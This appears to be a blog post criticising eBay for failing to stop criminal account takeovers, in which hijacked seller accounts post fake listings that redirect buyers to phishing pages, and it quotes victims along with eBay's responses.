I’ve been a member and seller on eBay with the same user ID since 1998, and regularly turn to the site when I want to buy or sell just about anything you can mail. But recently there have been attacks by criminal gangs on user accounts which eBay seems to be unable or unwilling to inhibit. These gangs take over an innocent user’s account, possibly by tricking them out of their username and password (or possibly through an internal eBay vuln, which I think is more likely), and then use that account to sell non-existent items (and collect the money) and to seek and find more victims.
Many of the compromised accounts have 100% positive feedback, and had prior sold hundreds of items. One victim who had his account hijacked says he was locked out of his account, and then later billed “around $50” by eBay for seller’s fees on items he had never heard of. When customers click on a scammer’s listing, they are redirected to a professional, official-looking page which asks them to log in and ‘confirm’ their credit card and bank account details! The items ostensibly for sale in these compromised listings range from smartphones and TVs to laptops and bicycles.
“We have no current plans to remove active content from eBay. However, we will continue to review all site features and content in the context of the benefit they bring our customers as well as overall site security.“
~~ Unsustainable Risk ~~
~~ Congratulations, Your Item Sold! ~~
One user whose account was used to make malicious listings with the XSS vuln said that his account had been “acting weird“. He was temporarily locked out, and listings were posted to his account by someone unknown to him.
“I kept getting emails saying, ‘Congratulations you’ve sold your iPad’. Well I hadn’t had an iPad for sale! I sent an email to eBay telling them there’s something wrong here, but they didn’t respond. Then they sent me an invoice saying I owe them $50 for ‘my selling fees’.”
eBay’s usual response when alarmed victims email them is, “Account takeovers generally occur as a result of a user disclosing their IDs or password. Unfortunately, it is a common practice of criminals to exploit well-known, trusted brand names like eBay to attract consumers and then lure them to a fake website or into other fraudulent situations.” In many cases eBay advises a victim to ‘clear their browser’s cookies and cache’, lol. Poor GrandMa…
Granted, there’s always a trade-off between making a site easy to use and attractive, versus making it secure. But eBay is far too susceptible to these sorts of attacks now and must move further toward security, for the protection of their giant, trusting user-base.,'after' => '') )